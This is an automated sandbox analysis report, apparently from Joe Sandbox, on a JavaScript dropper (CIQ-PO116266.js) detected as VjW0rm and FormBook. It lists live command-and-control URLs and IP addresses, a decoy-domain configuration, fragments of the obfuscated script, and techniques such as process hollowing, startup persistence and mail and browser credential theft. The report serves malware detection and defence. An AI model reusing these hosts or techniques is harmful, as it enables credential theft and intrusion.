Windows Analysis Report
CIQ-PO116266.js

Overview

General Information

Sample Name: CIQ-PO116266.js
Analysis ID: 635299
MD5: eb430ba81f36e80bb1a0b27a686ea1a9
SHA1: df9efb1dff452353f5ea481ecf721901107907ba
SHA256: 813f90ecb1ef908f765c987d20937654d2071da8d86ed60352f554786c11afb9
Tags: jsVjw0rm
Infos:

Detection

FormBook, VjW0rm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected VjW0rm
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Sigma detected: Drops script at startup location
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Wscript called in batch mode (surpress errors)
JavaScript source code contains functionality to generate code involving a shell, file or stream
Maps a DLL or memory area into another process
Creates multiple autostart registry keys
Uses netsh to modify the Windows network and firewall settings
JavaScript source code contains call to eval containing suspicious API calls
Performs DNS queries to domains with low reputation
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Drops script or batch files to the startup folder
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Creates a start menu entry (Start Menu\Programs\Startup)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Found malware configuration
Source: 00000000.00000003.292250245.0000024969786000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.gafcbooster.com/np8s/"], "decoy": ["segredovideos.online", "kishanshree.com", "mjmvn.com", "44bb44.com", "brawlhallacodestore.com", "littlebeartreeservices.com", "topings33.com", "nachuejooj07.xyz", "waermark.com", "halecamilla.site", "basincreekmedia.com", "resolutionmeasles.com", "interlink-travel.com", "siberup.xyz", "getbusinesscreditandfunding.com", "shcylzc.com", "68chengxinle.com", "jkrsbarmybookarmy.com", "geo-pacificoffshore.com", "refreshertowels.com", "localbloom.online", "brandingaloha.com", "84866.xyz", "salondutaxi.com", "harmlett.com", "angelmatic.net", "o7oiwlp.xyz", "thepowerofanopenquestion.com", "tokenascent.com", "udrivestorage.com", "hengyuejiguang.com", "minotaur.network", "ratebill.com", "18w99.com", "2264a.com", "tentanguang.online", "muddybootslife.com", "vitality-patients.online", "heavymettlelawyers.com", "spxtokensales.com", "titair.com", "lazarusnatura.com", "rasheedabossmoves.com", "medyumgalip.com", "liveafunday.xyz", "xn--wsthof-camping-gsb.com", "xfd8asvtivg944.xyz", "myhvn.site", "964061.com", "screeshot.com", "mysbaally.com", "connectfamily.loan", "langlev.com", "labsreports-menalab.com", "gabefancher.com", "jdhwh2nbiw234.com", "pdwfifi.com", "losangelesrentalz.com", "brandpay.xyz", "jlbwaterdamagerepairseattle.com", "wps-mtb.com", "sekolahkejepang.com", "saastainability.com", "multiverseofbooks.com"]}
Multi AV Scanner detection for submitted file
Source: CIQ-PO116266.js ReversingLabs: Detection: 14%
Yara detected FormBook
Source: Yara match File source: 2.2.bin.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.bin.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.292250245.0000024969786000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.372823411.0000000005604000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.830373431.0000000000E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.401722166.00000000014D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.830259140.0000000000B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.308018485.0000024969E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.299860714.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.300915140.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.801300107.0000000000910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.291613938.00000000013A1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.401531356.00000000013A1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.401874829.0000000001840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.300404894.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.344226970.0000000005604000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.302134868.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.292414870.0000024969A7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.295432260.00000249697F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.300557956.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.805718233.00000000009A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Lipg\msdxp.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED
Antivirus detection for URL or domain
Source: http://www.salondutaxi.com/np8s/ Avira URL Cloud: Label: malware
Source: http://www.littlebeartreeservices.com/np8s/ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreZXBsYWNl Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VredmFyIGN0 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrez Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreo_ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre1dG Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreol Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreKTsNClZO Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreok Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrew Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrex Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre-Agent(( Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreOI Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrer Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrenter2Pacv Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreo Avira URL Cloud: Label: malware
Source: www.gafcbooster.com/np8s/ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VrebWcgPSAi Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrek Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre0n Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrem Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreg Avira URL Cloud: Label: malware
Source: http://www.lazarusnatura.com/np8s/ Avira URL Cloud: Label: malware
Source: http://www.interlink-travel.com/np8s/ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreecuritycenterre Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreadkhan.duuo Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre_ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VregpOw Avira URL Cloud: Label: malware
Source: http://www.lazarusnatura.com/np8s/?2dEPbf=4hfxZPP84Ri&U48h=ki1nHMJkMrR7eeT2cjvvxShsxzdLToZEWe0Y/Ruw5T1OY282Gl8t0P/h1biOuIyNKIHU Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrea Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreXGxvY2Fs Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreadkhan.d Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreZigpIHsNrrE4 Avira URL Cloud: Label: malware
Source: http://www.udrivestorage.com/np8s/?U48h=Zh0bV6ZfyWWsx8NH2/NEuPodWNfo5oM06Wd1YTR0VEh7Ou4O0zYflewlPsoSmCQ+q/UO&2dEPbf=4hfxZPP84Ri Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre63209-4053062332-100 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreKS5yZXBsrrO Avira URL Cloud: Label: malware
Source: http://www.brandingaloha.com/np8s/?U48h=N6XRxtM6F1nBVZRwu48YOgJ13F0eVAmeAwT+lah6Tiq2+v96MM9EXT3L0sCJR4qYezv9&m88hS=6ld8i2BhSR2pvHw Avira URL Cloud: Label: malware
Source: http://www.interlink-travel.com/np8s/?U48h=O5u6OlqxnDtTF3riQ4xVZIWxoHxK/fTzbXBC76K0hST926FmxCw4JGrgecy53rLpUaVG&2dEPbf=4hfxZPP84Ri Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre1v Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VredI Avira URL Cloud: Label: malware
Source: http://www.nachuejooj07.xyz/np8s/?U48h=E3oeYQ/4MqgKR0uZQviaDeSIZFjg9uLLieRcSmG+YXW0WXU/K8viVoPbPV+txMCieWz0&m88hS=6ld8i2BhSR2pvHw Avira URL Cloud: Label: phishing
Source: http://www.udrivestorage.com/np8s/ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreIFIER=Intel64 Avira URL Cloud: Label: malware
Source: http://www.topings33.com/np8s/ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreadkhan.duuE4 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrei4 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreC Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreC:HOMEPATH= Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre-Agent((o Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre; Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreKS5yZXBsrr Avira URL Cloud: Label: malware
Source: http://www.brawlhallacodestore.com/np8s/?U48h=SjFSW0qH8X1Gu/+4r88YNPSLQa2KKx1h4LPt291Cc0nRXdmgbio7b0swgPTE4uOj94VU&m88hS=6ld8i2BhSR2pvHw Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre= Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre8 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre5 Avira URL Cloud: Label: malware
Source: http://www.jlbwaterdamagerepairseattle.com/np8s/?U48h=d/nstEfJj6EqHIao63FJ0s9GuqA95KQHoqtaktjr9/p2jHwlkCQ3yhCEo2yEkzAcnCwi&m88hS=6ld8i2BhSR2pvHw Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VretBgsX Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre0 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre088214C05064EeSI Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre- Avira URL Cloud: Label: malware
Source: http://www.xn--wsthof-camping-gsb.com/np8s/?U48h=1Nsioc0lpQImfCEv7q3CJRvbkNIovvFEONaUY8zyneWF7ypKO8GgemnIz8ljrbRyzkwj&m88hS=6ld8i2BhSR2pvHw Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VrejIJ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreows Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VrePro Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreadkhan.duu Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreVE Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreDQpyZXR1 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrex4 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre02-00600806D9B6 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre~42e Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre-0 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreDQppZiAo Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vres2 Avira URL Cloud: Label: malware
Source: http://www.68chengxinle.com/np8s/ Avira URL Cloud: Label: malware
Source: http://www.topings33.com/np8s/?U48h=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEPodkGcNW4yt&m88hS=6ld8i2BhSR2pvHw Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: littlebeartreeservices.com Virustotal: Detection: 6% Perma Link
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Lipg\msdxp.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\bin.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Lipg\msdxp.exe Metadefender: Detection: 48% Perma Link
Source: C:\Users\user\AppData\Local\Temp\Lipg\msdxp.exe ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\bin.exe Metadefender: Detection: 48% Perma Link
Source: C:\Users\user\AppData\Local\Temp\bin.exe ReversingLabs: Detection: 100%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Lipg\msdxp.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\bin.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 2.0.bin.exe.13a0000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.bin.exe.13a0000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: Binary string: netsh.pdb source: bin.exe, 00000002.00000002.402067381.0000000001910000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: bin.exe, 00000002.00000002.402156937.0000000001940000.00000040.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000003.296788051.00000000017A4000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000002.403727008.0000000001A5F000.00000040.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000003.293862136.000000000160F000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000012.00000003.403509898.0000000003122000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000012.00000003.401276125.0000000002F92000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000012.00000002.894403517.00000000033DF000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000012.00000002.841416056.00000000032C0000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: netsh.pdbGCTL source: bin.exe, 00000002.00000002.402067381.0000000001910000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: bin.exe, 00000002.00000002.402156937.0000000001940000.00000040.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000003.296788051.00000000017A4000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000002.403727008.0000000001A5F000.00000040.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000003.293862136.000000000160F000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000012.00000003.403509898.0000000003122000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000012.00000003.401276125.0000000002F92000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000012.00000002.894403517.00000000033DF000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000012.00000002.841416056.00000000032C0000.00000040.00000800.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_00921660 FindFirstFileW,FindNextFileW,FindClose, 18_2_00921660
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_00921659 FindFirstFileW,FindNextFileW,FindClose, 18_2_00921659
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior

Software Vulnerabilities
barindex
JavaScript source code contains functionality to generate code involving a shell, file or stream
Source: CIQ-PO116266.js Argument value : ['"gYMty=WSH.CreateObject("adodb.stream")"', '"gYMty=","WSH.CreateObject("adodb.stream")",-386'] Go to definition
Source: CIQ-PO116266.js Argument value : ['"gYMty=WSH.CreateObject("adodb.stream")"', 'gYMty,WSH.CreateObject("adodb.stream")', 'var H3br3w,WSH.CreateObject("microsoft.xmldom").createElement("mko"),H3br3w.dataType,"bin.base64",H3', '"gYMty=","WSH.CreateObject("adodb.stream")",-386', '"gYMty","WSH.CreateObject("adodb.stream")"'] Go to definition
Source: CIQ-PO116266.js Argument value : ['"gYMty=WSH.CreateObject("adodb.stream")"', 'gYMty,WSH.CreateObject("adodb.stream")', 'var H3br3w,WSH.CreateObject("microsoft.xmldom").createElement("mko"),H3br3w.dataType,"bin.base64",H3', '"gYMty=","WSH.CreateObject("adodb.stream")",-386', '"gYMty","WSH.CreateObject("adodb.stream")"'] Go to definition
JavaScript source code contains call to eval containing suspicious API calls
Source: CIQ-PO116266.js Argument value: ['"gYMty=WSH.CreateObject("adodb.stream")"', '"var H3br3w=WSH.CreateObject("microsoft.xmldom").createElement("mko")"'] Go to definition

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 104.21.8.218 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 160.153.136.3 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 15.197.142.173 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 81.169.145.161 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.topings33.com
Source: C:\Windows\explorer.exe Domain query: www.interlink-travel.com
Source: C:\Windows\explorer.exe Domain query: www.geo-pacificoffshore.com
Source: C:\Windows\explorer.exe Domain query: www.lazarusnatura.com
Source: C:\Windows\explorer.exe Domain query: www.brandingaloha.com
Source: C:\Windows\explorer.exe Domain query: www.salondutaxi.com
Source: C:\Windows\explorer.exe Domain query: www.68chengxinle.com
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.244 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 45.39.111.146 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.shcylzc.com
Source: C:\Windows\explorer.exe Domain query: www.xn--wsthof-camping-gsb.com
Source: C:\Windows\explorer.exe Domain query: www.nachuejooj07.xyz
Source: C:\Windows\explorer.exe Network Connect: 170.39.76.27 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.220.100.142 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.medyumgalip.com
Source: C:\Windows\explorer.exe Domain query: www.wps-mtb.com
Source: C:\Windows\System32\wscript.exe Domain query: dilshadkhan.duia.ro
Source: C:\Windows\explorer.exe Domain query: www.littlebeartreeservices.com
Source: C:\Windows\explorer.exe Domain query: www.kishanshree.com
Source: C:\Windows\explorer.exe Network Connect: 162.0.230.89 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 52.17.43.61 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.jlbwaterdamagerepairseattle.com
Source: C:\Windows\explorer.exe Domain query: www.jdhwh2nbiw234.com
Source: C:\Windows\explorer.exe Network Connect: 132.148.165.111 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.sekolahkejepang.com
Source: C:\Windows\explorer.exe Network Connect: 188.114.96.3 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.brawlhallacodestore.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.211 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 23.82.37.10 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 103.247.11.212 80 Jump to behavior
Source: C:\Windows\System32\wscript.exe Network Connect: 91.193.75.133 6670 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.gafcbooster.com
Source: C:\Windows\explorer.exe Domain query: www.udrivestorage.com
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.216 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.losangelesrentalz.com
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49796 -> 170.39.76.27:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49796 -> 170.39.76.27:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49796 -> 170.39.76.27:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49807 -> 81.169.145.161:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49807 -> 81.169.145.161:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49807 -> 81.169.145.161:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49822 -> 132.148.165.111:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49822 -> 132.148.165.111:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49822 -> 132.148.165.111:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49869 -> 103.247.11.212:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49869 -> 103.247.11.212:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49869 -> 103.247.11.212:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49881 -> 45.39.111.146:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49881 -> 45.39.111.146:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49881 -> 45.39.111.146:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49920 -> 15.197.142.173:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49920 -> 15.197.142.173:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49920 -> 15.197.142.173:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49946 -> 198.54.117.216:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49946 -> 198.54.117.216:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49946 -> 198.54.117.216:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49955 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49955 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49955 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49960 -> 154.220.100.142:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49960 -> 154.220.100.142:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49960 -> 154.220.100.142:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49969 -> 132.148.165.111:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49969 -> 132.148.165.111:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49969 -> 132.148.165.111:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49972 -> 132.148.165.111:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49972 -> 132.148.165.111:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49972 -> 132.148.165.111:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49978 -> 103.247.11.212:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49978 -> 103.247.11.212:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49978 -> 103.247.11.212:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49981 -> 45.39.111.146:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49981 -> 45.39.111.146:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49981 -> 45.39.111.146:80
Source: Traffic Snort IDS: 2829004 ETPRO TROJAN FormBook CnC Checkin (POST) 192.168.2.3:49968 -> 132.148.165.111:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49993 -> 15.197.142.173:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49993 -> 15.197.142.173:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49993 -> 15.197.142.173:80
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe DNS query: www.nachuejooj07.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.gafcbooster.com/np8s/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: PETRONAS-BHD-AS-APPetroliamNasionalBerhadMY PETRONAS-BHD-AS-APPetroliamNasionalBerhadMY
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
HTTP GET or POST without a user agent
